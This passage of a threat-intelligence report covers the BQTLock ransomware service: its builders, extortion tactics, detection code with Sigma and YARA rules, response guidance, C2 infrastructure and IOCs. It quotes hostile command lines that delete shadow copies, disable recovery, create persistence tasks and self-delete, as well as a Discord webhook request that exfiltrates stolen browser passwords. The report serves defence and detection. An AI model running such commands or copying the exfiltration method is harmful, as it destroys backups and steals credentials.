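    """True if the event's Image is `tool`, or `tool` is invoked inside the command line."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    stem = tool[:-4]                      # "vssadmin.exe" -> "vssadmin"
    return image.endswith("\\" + tool) or \
        re.search(r"(?<![\w.])" + re.escape(stem) + r"(\.exe)?\b", cmd) is not None


def match_event(event):
    """Return the rules that fire on one process-creation record."""
    cmd = event.get("CommandLine", "")
    return [r for r in RULES
            if _uses_tool(event, r.tool)
            and all(re.search(p, cmd, re.IGNORECASE) for p in r.patterns)]


def scan(events):
    """Return (ProcessId, technique, rule name) for every match, in input order."""
    return [(ev["ProcessId"], r.technique, r.name) for ev in events for r in match_event(ev)]


# Constructed sample telemetry (not a real capture). The last two records are benign
# administrative use of the same tools and must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"ProcessId": 4102, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic.exe shadowcopy delete"},
    {"ProcessId": 4103, "Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit.exe /set {default} recoveryenabled no"},
    {"ProcessId": 4104, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Microsoft\Windows\Maintenance\SystemHealthCheck" '
                    r'/tr "C:\Windows\Temp\bqt_payload.exe" /sc ONLOGON /rl HIGHEST /f'},
    {"ProcessId": 4105, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:\\FILESRV01 process call create "C:\Windows\Temp\bqt_payload.exe"'},
    {"ProcessId": 4106, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /C timeout /t 3 /nobreak > NUL & del /f /q "C:\Users\victim\Desktop\bqt_payload.exe" & exit'},
    {"ProcessId": 4107, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /query /tn \Microsoft\Windows\Defrag\ScheduledDefrag"},
    {"ProcessId": 4108, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The rules key on the arguments rather than on the tool alone, so routine "vssadmin list shadows" or "schtasks /query" does not fire; in production the same matcher would run over the EDR's process-creation stream, and the vssadmin, wmic and bcdedit hits in close succession on one host are the signal to isolate it before the encryption threads start.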
Encryption process
BQTLock initializing encryption
File extensions changed to .bqtlock
Builder
The Builder, as previously mentioned, is a key component of BQTLock: it lets affiliates and operators customize the ransomware they deploy on victim devices, giving adversaries considerable flexibility and autonomy.
BQTLock has two distinct Builders: one for Windows and one for Linux. The Windows Builder offers extensive customization, allowing modification of most relevant ransomware parameters:
● Ransom Note: custom message content and formatting
● Encrypted Extension: file extension applied to encrypted files
● Maximum File Size: size limit for files targeted for encryption
● Communication Channels: Discord channels, Telegram bots, and C2 infrastructure (IP and port configuration)
● Advanced Features:
- Logging capabilities
- Process termination
- Task persistence mechanisms
- Anti-VM/Anti-Debug protections
- Process hollowing
- Backup destruction
- UAC bypass methods
- Double extortion with screenshot capture and browser data exfiltration
● Visual Customization: ICO file modification and wallpaper replacement
BQTLock Ransomware Builder v4.0 #1
BQTLock Ransomware Builder v4.0 #2
BQTLock Ransomware Builder v4.0 #3
The Linux Builder is more limited; however, within the coming weeks or months its functionality is expected to be expanded to match the Windows Builder, given the need to target Linux systems and the high concentration of Linux servers in enterprise environments.
Currently, the Linux Builder allows modification of:
● Ransom Note: custom ransom message
● Encrypted Extension: file extension for encrypted files
● Maximum File Size: size threshold for encryption targets
● Communication Channels: Discord, Telegram, and C2 configuration (IP and port)
● Advanced Features:
- Process termination (targeting security tools such as OSSEC, Splunk, etc.)
- systemd persistence mechanisms
- Anti-VM/Anti-Debug protections
- Backup destruction using `rm -rf` commands
● Visual Elements: ICO and wallpaper customization
BQTLock Ransomware Builder, Linux Edition
Special Features
Analyzing the BQTLock versions collectively, it is worth identifying the aspects that are uncommon, or that differ from similar RaaS platforms, to understand its current position and anticipate its evolution over the coming months.
● Cross-Platform Builder Customization: present across two distinct operating systems (Windows and Linux), enabling modification of icons, wallpapers, ransom notes, encryption extensions, self-deletion, anti-analysis techniques, etc.
This is a feature more commonly found in stealers than in ransomware.
● API Integration: enables streamlined automation and more agile communication.
● Triple Communication Architecture: connects to the panel, Discord, and Telegram simultaneously, giving comprehensive control over notifications and exfiltration while using legitimate platforms for operational security.
● Modern Protocol Implementation: uses contemporary communication protocols, including HTTP/3 and QUIC, for performance and evasion.
● Adaptive UAC Bypass: employs operating-system-specific User Account Control bypass techniques tailored to the target environment.
● Individualized BOT-ID Generation and Tracking: creates a unique identifier for each compromised device, used in external communication across the different channels.
● Integrated Stealer Capabilities: extracts browser data and captures victim screenshots, then exfiltrates the stolen intelligence.
Extortion Methods
Once the RaaS affiliate or operator has acted, a phase of extortion and psychological pressure begins, both in the media and operationally. The adversary can use the resources provided by the ransomware itself (stolen sensitive information, screenshots, unusable files) and the public exposure all of this brings, which highlights the affected company's lack of professionalism or defenses and can cause severe damage to the company, its suppliers, and its investors.
Double and Triple Extortion
BQTLock is no exception in applying double or triple extortion, depending on the victim and on how the builder was configured, which allows different options.
Once systems are affected, the adversary can blackmail the victim with the classic ransomware extortion, "if you want to recover the files, pay", through the ransom note left in the affected paths, which carries all the information needed to maintain contact: usually a Telegram account, an address, or an email for speaking with those who perpetrated the attack.
To this, BQTLock tends to add public shaming, threatening to publish the information obtained on its many social channels. BQTLock is highly active and maintains both personal Telegram accounts, where it publishes all its incursions, and parallel work within hacktivist groups on Telegram and Twitter, as well as a website (.onion) where it also lists its victims.
Additionally, BQTLock obtains browser information and screenshots that reinforce double extortion when sensitive information or extractable credentials are involved. On occasion they have carried out more strategic attacks related to educational or military targets, using the first attack as a link to threaten attacks on other objectives (such as DDoS attacks, or exploitation of stolen credentials against partner or client infrastructure), producing a triple extortion that leaves the victim little room for maneuver at a moment of maximum tension.
Pressure Warfare & Psychological Tactics
Beyond post-encryption activities that may resemble those of other RaaS operations, this group is characterized by especially aggressive tactics in its modus operandi.
In the Waves model explained previously, the actor is aggressive, forcing victims to pay in under 48 hours under threat of doubling the ransom, and setting deadlines both for payment and for the destruction of all files by deleting the decryption key after 7 days, a practice usually known as "panic buying".
Additionally, BQTLock threatens to publicly sell the data extracted moments before encryption, and has built a tool for searching affected credentials (BAQIYAT.osint), adding further psychological tension.
Victim communication panel
On affected devices, icons, wallpapers, and ransom notes are changed as needed, which also plays an important role in pressuring the victim. Each affiliate can introduce or propose new measures for their victims, multiplying the abusive tactics BQTLock already provides as a baseline.
At all times, the actor shows its proximity to hacktivist groups, using geopolitical conflicts to justify its attacks and posing as "freedom fighters" to escape the label of ransomware criminals. This generates empathy in some quarters and fear in others, and the narrative is used to add pressure on companies or countries opposed to its ideals, creating a psychological attack before the ransomware is even deployed, and aligning BQTLock attacks with geopolitical events to maximize media impact and attract affiliates who share its ideology.
Threat Intelligence Implications
As previously noted, BQTLock has evolved significantly in recent months, gaining visibility and shaping a very distinct and well-defined profile.
Understanding what its next moves might be, and how its narratives, techniques, and geopolitical objectives will develop, could be crucial.
Insights Into the Future of RaaS based on BQTLock
BQTLock has shown that affiliates do not need a large infrastructure: they can rely on legitimate services such as Telegram or Discord to manage operations and obtain information, with redundancy across channels to ensure availability for future ransomware clients. This operational philosophy lets BQTLock keep infrastructure expenses and costs to a minimum.
The clear path forward is the continued use of bot APIs and pre-built panels, with future effort focused on adding functionality to the ransomware and improving its performance in Linux environments, as well as enhancing Windows capabilities, rather than on building complex infrastructure. This makes it easy for any affiliate to adapt to the structure established by BQTLock and its developers, lowering costs and barriers to entry and accelerating the expansion of this RaaS.
Trends: Hybrid Groups
Whenever possible, actors will maintain a hacktivist façade, given the connection between ZeroDayX and the hacktivist group liwaamohammad, which in turn has ties with other similar groups. This attracts investors or affiliates who share their vision, even if, internally, the façade hides purely financial motivations.
The combination of hacktivism and financial gain is an unusual trait, somewhat comparable to certain APT groups that deploy wipers against geopolitical rivals, not only to harm enemies economically but also to exploit the "freedom fighter" narrative. This hacktivist framing helps justify attacks against certain countries or sectors, disguising a profit-driven scheme as a political cause. The rise of such groups, especially amid ongoing geopolitical conflicts, encourages other adversaries to adopt this hybrid model.
They leverage political narratives to gain visibility, which in turn translates into greater profitability in the medium and long term.
Recommendations
Analyzing information and understanding how the adversary operates is just as important as knowing how to protect yourself and counter them, especially given the constant changes they apply to their techniques and tools.
Detection
From a detection perspective, countermeasures can be built from the threat actor's behavior and the ransomware's capabilities, to mitigate potential impact using already known defensive methods. The essential detection rules are below. For the complete set, visit the SOCRadar platform.
Sigma
[SOCR][TA0005][T1070.004] Command Delay and File Deletion
title: Suspicious Timeout Followed by File Deletion via CMD
description: Detects use of cmd.exe with timeout /nobreak followed by file deletion, a possible technique for delaying and evading analysis
author: SOCRadar
date: 2025-09
tags:
  - attack.defense_evasion
  - attack.t1070.004
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\cmd.exe'
    CommandLine|contains|all:
      - 'timeout'
      - '/nobreak'
      - 'NUL & del /f /q'
  condition: selection
[SOCR][TA0004][T1548.002] UAC Bypass via Fodhelper/Eventvwr
title: UAC Bypass via Fodhelper or Eventvwr Spawning Suspicious Processes
description: Detects abuse of fodhelper.exe or eventvwr.exe to escalate privileges by running suspicious secondary processes such as conhost.exe, explorer.exe, or schtasks.exe
author: SOCRadar
date: 2025-09
tags:
  - attack.privilege_escalation
  - attack.t1548.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\fodhelper.exe'
      - '\eventvwr.exe'
  selection_child:
    Image|endswith:
      - '\conhost.exe'
      - '\explorer.exe'
      - '\schtasks.exe'
  condition: selection_parent
    and selection_child
[SOCR][TA0003][T1136.001] Suspicious Local Admin Account Creation
title: Suspicious User Account Creation Named BQTLockAdmin or Guest_
description: Detects the creation of suspicious users named BQTLockAdmin or matching the pattern Guest_(3-6 digits), activity associated with ransomware and malicious persistence
author: SOCRadar
date: 2025-09
tags:
  - attack.persistence
  - attack.t1136.001
logsource:
  product: windows
  service: security
detection:
  selection_user_created:
    EventID: 4720
  selection_suspicious_name:
    TargetUserName|contains: 'BQTLockAdmin'
  selection_guest_pattern:
    TargetUserName|re: '^Guest_[0-9]{3,6}$'
  condition: selection_user_created and (selection_suspicious_name or selection_guest_pattern)
Complete rule set: https://platform.socradar.com/
Yara
rule BQTLock_RaaS {
    meta:
        description = "Detection of BQTLock ransomware samples"
        category = "Ransomware"
        author = "SOCRadar"
        reference = ""
        date = "2025-09"
    strings:
        $a1 = /CreateEventEx(W|A)?/ ascii nocase
        $a2 = /InternetOpenUrl(A|W)?/ ascii nocase
        $a3 = /InternetCrackUrl(A|W)?/ ascii nocase
        $a4 = "NtUnmapViewOfSection" ascii nocase
        $a5 = "LockFile" ascii nocase
        $a6 = "MapViewOfFile" ascii nocase
        $a7 = /CreateFileMapping(A|W)?/ ascii nocase
        $a8 = "CreateToolhelp32Snapshot" ascii nocase
        $a9 = "ShellExecute" ascii nocase
        $a10 = "CryptAcquireContext" ascii nocase
        $a11 = "CryptGenRandom" ascii nocase
        $a12 = /SELECT\s/i
        $a13 = "CMSTP" ascii nocase
        $a14 = /RSA\s*key/i
        $a15 = "openssl" ascii nocase
        $a16 = /AES-(128|192|256)/ ascii nocase
        $a17 = /EVP_(Encrypt|Decrypt|Cipher)/ ascii nocase
        $a18 = "mingw" ascii nocase
        $a19 = "VT_" ascii nocase
        $a20 = /(gethostname|gethostbyname)/ ascii nocase
        $a21 = "/sc onlogon" ascii nocase
        $a22 =
        /FindFirstVolume(W|A)?/ ascii nocase
        $a23 = "IsProcessorFeaturePresent" ascii nocase
        $a24 = "PKEY" ascii nocase
        $a25 = "%s:" ascii nocase
        $b1 = { 48 8d 15 ?? ?? 60 00 48 8d 8c 24 80 00 00 00 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 8d 8c 24 80 00 00 00 e8 ?? ?? ?? ?? 41 b8 01 00 00 00 48 8d 15 ?? ?? 60 00 48 89 c1 48 89 c7 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 89 f9 e8 ?? ?? ?? ?? 41 b8 07 00 00 00 48 8d 15 ?? ?? 60 00 48 89 c1 48 89 c7 e8 ?? ?? ?? ?? 8b 15 ?? ?? ?? 00 48 89 f9 e8 ?? ?? ?? ?? 66 83 3d ?? ?? ?? 00 00 74 2e 41 b8 03 00 00 00 48 8d 15 ?? ?? 60 00 }
        $b2 = { e8 ?? ?? 5c 00 41 b8 11 00 00 00 48 8d 15 ?? ?? 60 00 48 8d 4c 24 38 e8 ?? ?? 58 00 }
        $b3 = { 48 83 ec 38 48 8d 05 ?? ?? f2 ff 48 89 44 24 20 e8 ?? ?? f1 ff 48 83 c4 38 c3 }
        $b4 = { 48 8d ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? (45 31 c0 | 41 b8 00 00 00 00) 48 89 d9 48 8d 15 ?? ?? 60 00 e8 ?? ?? 50 00 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? 5a 00 (48 83 7c 24 78 ff | 48 83 f8 ff 0f 94 c3) }
        $b5 = { (44 8b 84 24 ?? ?? ?? ?? | 8b 45 ??) (31 d2 | ba 00 00 00 00) b9 01 00 00 00 (ff 15 ?? ?? ?? 00 | ff d0) (48 89 c6 | 48 89 85 ?? ?? 00 00) (48 85 c0 | 48 83 bd ?? ?? 00 00 00) 0f 84 ?? ?? 00 00 (31 d2 | ba 01 00 00 00) (48 89 c1 | 48 89 c1) (ff 15 ?? ?? ?? 00 | ff d0) 85 c0 (0f 84 ?? ?? 00 00 | 0f 95 c0 84 c0 0f 84 ?? ?? 00 00) }
        $b6 = { e8 ?? ?? ?? 00 (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) (48 89 c1 | 48 89 85 ?? ?? 00 00) (48 89 44 24 ?? | 48 8b 85 ?? ?? 00 00) (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) (49 89 c6 | 48 89 85 ?? ?? 00 00) (41 ff d5 | 89 85 ?? ?? 00 00) (41 89 c0 | b9 01 00 00 00) (44 89 e2 | 8b 8d ?? ?? 00 00) (4c 89 f1 | 8b 95 ?? ?? 00 00) (ff 15 ?? ?? ?? 00 | 48 8b 05 ?? ?? ?? 00 ff d0) }
        $b7 = { e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 8b 95 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 8d 8d ?? ?? 00 00 48 8d 15 ?? ?? 0f 00 49 89 c8 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ??
               00 00 48 8d 0d ?? ?? 0f 00 48 8d 95 ?? ?? 00 00 49 89 c8 48 89 c1 }
        $b8 = { (48 89 c1 | e8 ?? ?? ?? 00) e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 45 40 48 89 c1 e8 ?? ?? ?? 00 48 8b 85 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 (48 89 85 ?? ?? 00 00 | 90 90) 48 8d 8d ?? ?? 00 00 48 8d 15 ?? ?? 0f 00 48 8d 85 ?? ?? 00 00 49 89 c8 48 89 c1 e8 ?? ?? ?? 00 48 8d 85 ?? ?? 00 00 48 8b 95 ?? ?? 00 00 48 89 c1 e8 ?? ?? ?? 00 }
    condition:
        filesize > 800KB
        and filesize < 10MB
        and (8 of ($a*))
        and (1 of ($b*))
        and any of ($a14, $a15, $a16, $a17)
        and uint16(0) == 0x5a4d
        and uint32(uint32(0x3C)) == 0x00004550
}
Response & Mitigation
Developing strategies or playbooks to contain and react to an attack like BQTLock is also a key component of the defensive strategy. Designing specific measures to strengthen protection in this area can make a significant difference.
Response
- Isolate affected systems
  - Disconnect machines from the network (both cable and Wi-Fi) to isolate infected devices
  - Disable suspicious accounts (BQTLockAdmin, Guest_xxxx)
- Stop lateral movement
  - Block remote access protocols such as SMB or RDP
  - Revoke compromised credentials (both domain and local)
  - Terminate injected processes or BQTLock binary processes
- Cut C2 communications
  - Block the Telegram and Discord IP ranges that BQTLock may use as C2, via firewall and proxy
  - Review DNS logs and outbound connections to detect persistent activity
- Preserve evidence
  - Collect memory dumps, disk images, and export EDR, Sysmon, and AD logs
  - Do not shut down critical servers until forensic snapshots have been obtained
Eradication and Remediation
- Remove persistence
  - Search for and delete BQTLock-related scheduled tasks (schtasks /query)
  - Review hijacked registry keys (\shell\open\command, ms-settings, or mscfile)
- Remove malicious
accounts
  - Enforce password resets across all administrative accounts
  - Audit account creation logs (EventID 4720)
- Eliminate binaries and malicious files, and deploy detection rules
  - Locate files such as bqt_payload.exe, bqt_log.txt, bqt_screenshot_*.png
  - Use the YARA and Sigma rules, and develop additional rules based on observed changes in BQTLock variants
- System restoration
  - Restore from clean, offline backups
  - If no reliable backup exists, evaluate forensic recovery tools for shadow copies (if not deleted by vssadmin)
Preventive Mitigation
- Endpoint hardening
  - Restrict use of WMIC, bcdedit, vssadmin, and schtasks to authorized administrators
  - Implement AppLocker or WDAC to block execution from %AppData% and %Temp%
- Account and privilege hardening
  - Disable the local Administrator account
  - Enforce MFA on all RDP and VPN access
- Robust backups
  - Ensure immutable backups and perform regular restoration tests
  - Segment the backup network
- Monitoring and detection
  - Deploy Sigma rules and develop custom EDR rules
  - Monitor for suspicious account creation and administrative tool execution
- Network filtering
  - Block Telegram, Discord, or BQTLock panel IPs/CIDRs linked to C2 via firewall and proxy
  - Monitor explorer.exe connections to the internet
Further Intelligence Feed
The attacker has used multiple infrastructures during their campaigns, leaving traces in the RaaS samples. Understanding what was used and how it was deployed is a valuable advantage for establishing mitigation strategies and mapping the adversary's infrastructure.
Panel
Whether operated by affiliates or operators, the builder configures the C&C server used for communication and for the bootstart tasks. Two recurring IPs have been observed: 92.113.146[.]56 and 208.99.44[.]55.
The first IP has been reported and is directly linked to BQTLock.
Source: SOCRadar Platform
Its general characteristics show an nginx login panel explicitly referencing BQTLock, which suggested pivoting to other machines exposing the same string, although no additional instances were found.
General information about the C2 domain
C2 - port 80 (nginx 1.24.0, Ubuntu), showing HTTP headers and session cookie details
Header details for the C2 IP
Based on the characteristics of this initial address, more than 200 similar IPs were identified, some of which also exposed ports 22 and 80 like the original panel, though none were reported or displayed identical traits.
Similar IPs
Additional neighboring IPs were identified through Validin.
Neighbor IP address
Neighbor domain
The relationship between this IP and the ransomware hashes that the SOCRadar platform links directly to BQTLock is clearly visible:
Source: SOCRadar Platform
This initial IP is, as one might guess, the login panel of the BQTLock C2, where affiliates and operators log in to locate victims using the information sent during the bootstart stage:
Login panel
For the second IP, different characteristics were noted, with only one other related address found.
Nevertheless, it serves the same function as the first, acting as a portal for affiliates and operators:
On this occasion, this IP also appears to be linked to other clear BQTLock indicators:
Source: SOCRadar Platform
Interacting with these panels returns an identifier that is later used for authenticating with the victim's ID:
Telegram & Discord
Telegram is used during ransomware execution to transmit collected data via bots. In these executions, the adversary gathered sensitive information (OS, hostname, HWID, etc.) and linked it to the administrator account and password created on the infected device when sending requests. The attacker uses multiple bots, so retrieving or accessing information may not always be possible, even when the fields are extracted and the requests simulated:
#1
#2
The typical flow is a request containing victim system data, reflected in the bot, which affiliates or operators can review directly from their mobile devices without logging into the panel:
Telegram bot output for victim system data
Additionally, tools like Matkap can correlate tokens across domains, helping extract potential IOCs from the bots reversed during analysis:
Matkap output
On Discord, the adversary uses webhooks to send files containing sensitive victim data, creating a third communication channel (Sample → Affiliate/Operator). These webhooks are frequently rotated or banned, complicating infrastructure tracking. The basic functionality sends a multipart request carrying a JSON payload plus an attached file, typically bqt_passwords.txt, containing browser credentials.
This allows the adversary to receive sensitive data immediately.
POST /api/webhooks// HTTP/xx
Host: discord.com
User-Agent: Mozilla/xx
Accept: application/json
Content-Type: multipart/form-data; boundary=---------------------------2327476541
Content-Length:

-----------------------------2327476541
Content-Disposition: form-data; name="payload_json"
Content-Type: application/json

{ "content": "File attached: bqt_passwords.txt" }
-----------------------------2327476541
Content-Disposition: form-data; name="passwords_file"; filename="bqt_passwords.txt"
Content-Type: text/plain

--- Collected Browser Passwords ---
-----------------------------2327476541--
On Discord, the webhook is configured to receive the requests and files containing data harvested from browsers:
#1
#2
#3
Conclusion
In summary, BQTLock is a RaaS that has demonstrated versatility, with traits that set it apart from other adversaries of its kind. It is rooted in strong political propaganda, which is uncommon in its niche. Its objectives will continue to be framed as ideological claims, even though the underlying motives remain criminal. At every stage they will seek to develop and evolve the ransomware while maximizing exposure to attract more affiliates, carrying out gradual attacks that push them higher in the global ransomware rankings. Although they are currently undergoing a period of change, with modifications to infrastructure, malware, and their website, the ideals and direction they established from the very beginning will remain constant.
MITRE ATT&CK TTPs

Tactic | Technique | Description / Example
TA0002 Execution | T1047: Windows Management Instrumentation | Remote execution of the binary, as well as deletion of Shadow Copies, by abusing WMI (process call create)
TA0002 Execution | T1055.012: Process Hollowing | Process hollowing
TA0003 Persistence | T1053: Scheduled Task/Job | schtasks /create /tn "" /tr "C:\Users\\Desktop\.exe" /sc ONLOGON /rl HIGHEST /f
TA0003 Persistence | T1136.001: Create Account: Local Account | Create new admin user
TA0004 Privilege Escalation | T1548.002: Bypass User Account Control | UAC abuse to execute legitimate binaries (CMSTP, fodhelper & eventvwr)
TA0005 Defense Evasion | T1112: Modify Registry | Modification of registry
TA0005 Defense Evasion | T1562.001: Impair Defenses: Disable Tools | Kill security processes (e.g., Sysmon)
TA0005 Defense Evasion | T1070.004: File Deletion | Auto-delete file (e.g., cmd.exe /C timeout /t 3 /nobreak > NUL & del /f /q "")
TA0005 Defense Evasion | T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control | UAC bypass via CMSTP (.inf with /s), later using fodhelper or eventvwr.exe
TA0006 Credential Access | T1078: Valid Accounts | Check admin privileges
TA0006 Credential Access | T1555.003: Credentials from Web Browsers | Collect saved passwords from browsers
TA0006 Credential Access | T1074: Data Staged | Saved passwords written to C:\Windows\Temp\_passwords.txt
TA0007 Discovery | T1082: System Information Discovery | System information discovery
TA0009 Collection | T1622: Debugger Evasion | Anti-debug checks
TA0009 Collection | T1113: Screen Capture | Take screenshots
TA0011 Command and Control | T1071.001: Application Layer Protocol: Web | Get public IP via WinInet
TA0011 Command and Control | T1041: Exfiltration Over C2 Channel | Extract info collected to C2
TA0040 Impact | T1486: Data Encrypted for Impact | File encryption
TA0040 Impact | T1490: Inhibit System Recovery | Delete backups (VSS, Shadow Copies, Volume Snapshots)

Technique references:
https://attack.mitre.org/techniques/T1047/
https://attack.mitre.org/techniques/T1055/012/
https://attack.mitre.org/techniques/T1053/
https://attack.mitre.org/techniques/T1136/001/
https://attack.mitre.org/techniques/T1548/002/
https://attack.mitre.org/techniques/T1112/
https://attack.mitre.org/techniques/T1562/001/
https://attack.mitre.org/techniques/T1070/004/
https://attack.mitre.org/techniques/T1078/
https://attack.mitre.org/techniques/T1555/003/
https://attack.mitre.org/techniques/T1074/
https://attack.mitre.org/techniques/T1082/
https://attack.mitre.org/techniques/T1622/
https://attack.mitre.org/techniques/T1113/
https://attack.mitre.org/techniques/T1071/001/
https://attack.mitre.org/techniques/T1041/
https://attack.mitre.org/techniques/T1486/
https://attack.mitre.org/techniques/T1490/

IOCs

SHA-256 hashes:
● 425b2f283b71237276f84d941d9c2982c7f61a9aff12ece10e15065b73b7165e
● b211537ea626fae4ad2ef5ee2652633dc68aaf20da6eb953a44f266c4106b367
● 11affbeb18f4d6edcc9a4be5a82f8e23dfc31178887e97119faa5ddc75990494
● 00005ed250d85fc47e4c3883b8e6179a9888b8140acfeb94a40edc36bd523adb
● a6a397fec6c109a1402c6f1144d647843b2093f65fedd27204b40ebeea0640b6
● 618070d597dd73c43ba5d4bde2baa93a4f6038e3279de3bafe688caa5c409a58
● cd5e7b3b59cea14b804f6c01821d1ab94a0046422fe956f623b238c5db0cac99
● 4369aed581de0fe84c25a1ef2c3cf0bb6bf70df8b51fdf38b3b0b2a55f43261b
● 862f29aa00bb4ee33729bc6699990dbdf9ef890b8364f8288b173cb1ca5d6787
● 49f89b2fdef345a9d92fc821e4a226d8ac99e4ca0d2d11b5654f6557800b85f2
● 881b048234ebed82339244eb0c18580d785944dc82f83949f6adc1a9bc225c3b
● f77c203d0c80598954c06a0f6f0c46f8b885ba423d12a21f13ded0168aa11b10
● dacbba7f18d0835deb2eeb4e4d82c8f57234767291a90da1a5f3fd02d6bc13c2
● fbd67a3bcc964e370931f620a85bf368d7b5797ebc1d53fe3be11a89a90e7961
● 10938c2d01dc999d2fe1f8c635e3705e7e663077935a17e730c849d1191c76ed
● e2622ede1ebe5a37c439a32f0c63c13f893d1e5513b27367502898651cc5464b
● 590e47944ef0597bf1ff1d41656859b776e7031a4611cbf22d619002cbe49312
● 97524f4c582e0fbe46b74a7cfe4db9f078f368520cda25f27a50c5d2c50161f9
● 56eec59a5fe3f5a3c2c836701557bf1956770f465cd9e049995b86aef76a3e39
● b61ae633616d7dd29aaf0b170fdfbe8f282c0f8bdcb1c52aedee473ce4bf5789
● 780e34c72404fd464669626ae554b81393d2bae95293284b375bb5d989914486
● 5b992a3438e344dddcdd66151a40efb3452b2ff37cdc40b37db612afeb29ed29
● 008ec0226066572f4b27f100d08443120b9dd55cefbec2bbff994b5b552e546c
● 0ccd3f2d7e6637eaf5414e35b97d9d8bf6b8e4182859cace8ca8e02377a4e62a
● 9547933dd46501af7fc095a3513e48b81178e344b86e075b679259875f0fd5a7
● af90666822646e35eb52248f4a89eb715ce9f44459205bc24827a2aafe053548
● 324eabc27a25f524c94bb62573986b3335ab5181ddc6825d959d16aaaccdc7aa
● b7796a3b1812f329c43d5d37bbb6d8032b7bc06b15af29f555eb3e0c7b1b1c3d
● 9cd62dbace3324487124787127cff7c63a9f005d8d3aff9bac28c437e5caefc7

IP addresses:
❖ 92.113.146[.]56
❖ 208.99.44[.]55

Domain:
➔ bcoins[.]online

Ransom Onion Site:
yywhylvqeqynzik6ibocb53o2nat7lmzn5ynjpar3stndzcgmy6dkgid.onion

TA Social Networks:
https://t.me/BQTlock_raas
https://t.me/Fuch0u
https://t.me/liwaamohammad
https://t.me/BQTlock
https://x.com/zerodayx1
https://t.me/ZeroDayX1
https://x.com/anonlb_
https://t.me/anonlb
https://t.me/BQTosint

TA Webpage:
https://guns.lol/zerodayx

Mail:
BQTlock@tutanmail.com

Wallet:
89RQN2EUmiX6vL7nTv3viqUAgbDpN4ab329zPCEgbceQJuS233uye4eXtYk3MXAtVoKNMmzgVrxXphLZbJPtearY7QVuApr

External Resources

https://x.com/JAMESWT_WT/status/1958071306454184200
https://x.com/Fact_Finder03/status/1958046987472769319
https://x.com/ido_cohen2/status/1950860288556761191
https://x.com/askardyuss/status/1950252992936235246
https://x.com/1ZRR4H/status/1958181978479419430
https://x.com/zerodayx1/status/1954946452842750048
https://x.com/askardyuss/status/1949201446936752172
https://x.com/abdul__alamri/status/1949468133309178050
https://x.com/search?q=LulzSec%20AND%20bQTLock&src=typed_query&f=live
https://cybershafarat.com/2025/04/09/doxx-zerodayx/
https://www.pcrisk.com/removal-guides/33382-bqtlock-ransomware
https://www.dexpose.io/bqtlock-ransomware-hits-european-business-server-cluster-in-ireland/
https://www.cyfirma.com/news/weekly-intelligence-report-25-july-2025/
https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/bqtlock
https://cybershafarat.com/2025/07/16/bqtlock-ransomware-v1/
https://cybershafarat.com/2025/07/30/bqtlock-ransomware-op-status/
https://cybershafarat.com/2025/07/19/bqtlock-raas-now-available/
https://labs.k7computing.com/index.php/examining-the-tactics-of-bqtlock-ransomware-its-variants/
https://www.resecurity.com/blog/article/iran-linked-threat-actors-leak-visitors-and-athletes-data-from-saudi-games
https://id-ransomware.blogspot.com/2025/07/baqiyatlock-ransomware.html
https://cn-sec.com/archives/4356728.html
https://www.163.com/dy/article/K6N2G2KI0538B1YX.html
https://otx.alienvault.com/pulse/68a90698ae03099dfa5b86cf

Who is SOCRadar?

SOCRadar provides Extended Threat Intelligence (XTI) that combines "Cyber Threat Intelligence, Brand Protection, External Attack Surface Management, and Dark Web Radar Services." SOCRadar provides the actionable and timely intelligence context you need to manage the risks in the transformation era. Trusted by 21.000+ companies in 150+ countries.

Dark Web Monitoring: SOCRadar's fusion of its unique Dark Web recon technology with the human analyst eye further provides in-depth insights into financially-targeted APT groups and the threat landscape.

Protecting Customers' PII: Scan millions of data points on the surface, deep and Dark Web to accurately identify the leakage of your customers' Personally Identifiable Information (PII) in compliance with regulations.

Credit Card Monitoring: Enhance your fraud detection mechanisms with automation speed by identifying stolen credit card data on popular global black markets, carding forums, social channels, and chatters.
360-Degree Visibility: Achieve digital resilience by maintaining an internet-facing digital asset inventory. Significantly accelerate this process through automated discovery, mapping, and continuous asset monitoring.

START YOUR FREE TRIAL

Discover SOCRadar's powerful tools and easy-to-use interface to enhance cyber threat intelligence efforts. Schedule a demo with our experts to see it in action, and we'll show you what SOCRadar can do.

https://socradar.io/products/extended-threat-intelligence/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=ExtendedThreatIntelligence&utm_content=FormSubmissions
https://socradar.io/use-for-free/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=FreeAccess&utm_content=FormSubmissions
